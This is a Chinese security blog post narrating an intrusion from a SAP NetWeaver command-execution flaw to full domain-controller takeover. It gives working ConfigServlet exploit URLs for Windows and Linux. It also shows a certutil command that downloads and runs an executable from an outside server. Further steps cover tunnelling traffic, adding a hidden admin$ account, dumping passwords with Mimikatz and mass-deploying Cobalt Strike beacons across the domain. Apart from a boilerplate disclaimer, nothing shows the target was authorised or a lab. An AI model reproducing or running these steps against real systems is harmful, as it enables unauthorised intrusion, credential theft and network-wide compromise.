记一次命令执行到内网渗透拿下域控

admin 2021年8月2日22:33:54评论142 views字数 1443阅读4分48秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


原文地址:https://www.xljtj.com/archives/ad.html


目标站采用SAP NetWeaver是SAP的集成平台,SAP命令执行payload为网址+命令。


Windows执行:
http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd /c net user

Linux执行:

http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id

由于提前得知目标为Windows机器,直接在目标网站执行net user,得到如下结果

记一次命令执行到内网渗透拿下域控

查看当前用户,权限以及网络信息

记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控

记一次命令执行到内网渗透拿下域控


得到当前用户sapxxx为administrator权限,同时为内网机器,那么就可以直接执行Windows自带的下载命令,来下载一个狗洞,用来转发流量。


当然你可以直接执行比如CS、MSF、以及你自己的远控等等,但是要考虑免杀问题,就用狗洞来操作。


Windows下载命令:

certutil -urlcache -split -f http://8.8.8.8/test.exe C:test.exe

下载好之后,首先要用狗洞服务端在你自己外网服务器打开一个监听功能,目标机器执行上线命令,然后等待上线
记一次命令执行到内网渗透拿下域控

成功上线后,自己电脑连接狗洞,出现此提示为连接成功,之后用代理软件,比如Proxifier或者Sockscap等工具代理本机127.0.0.1 8088端口

记一次命令执行到内网渗透拿下域控


然后用命令执行去添加一个管理权限的用户,根据上面ipconfig得到的内网ip:10.85.x.x,直接连接其3389,成功添加账号admin$,直接登陆成功


在这里友情提示下,内网中存在域时,登陆账号要选择当前域计算机用户去登陆,不然会登陆不上
记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控

执行查询域管机命令发现没权限,然后用猕猴桃抓取一下本机账号密码,

记一次命令执行到内网渗透拿下域控

使用administxxx账号,ATxxx域去登陆,查询域管机与域管用户
记一次命令执行到内网渗透拿下域控

巧了不是,直接用得到的ATxxxAdministxxx去登陆SRV-DC-xx或者SRV-MAIN-xx,ping SRV-DC-xx和SRV-MAIN-xx得到ip

记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控

登录后

记一次命令执行到内网渗透拿下域控

记一次命令执行到内网渗透拿下域控

既然内网机器并无杀软,那么尝试上一个cs批量上线吧,搭建好cs服务端,直接生成文件在域控机上执行,等待机器上线后,右键执行猕猴桃,或者转储hash,让他自动获取密码
记一次命令执行到内网渗透拿下域控

然后执行net view或者arp -a来获取目标ip
记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控

然后到目标处随便框选几台机器,当然你也可以全部选择,右键,登陆
记一次命令执行到内网渗透拿下域控

然后选择你刚才搞出来的账号密码,选择一个监听器,坐等机器上线即可

记一次命令执行到内网渗透拿下域控


最后给各位大佬比心,PS: 有指教请您留言
记一次命令执行到内网渗透拿下域控



关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读




记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控
记一次命令执行到内网渗透拿下域控

欢 迎 私 下 骚 扰



记一次命令执行到内网渗透拿下域控

本文始发于微信公众号(潇湘信安):记一次命令执行到内网渗透拿下域控

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日22:33:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次命令执行到内网渗透拿下域控https://cn-sec.com/archives/365638.html

发表评论

匿名网友 填写信息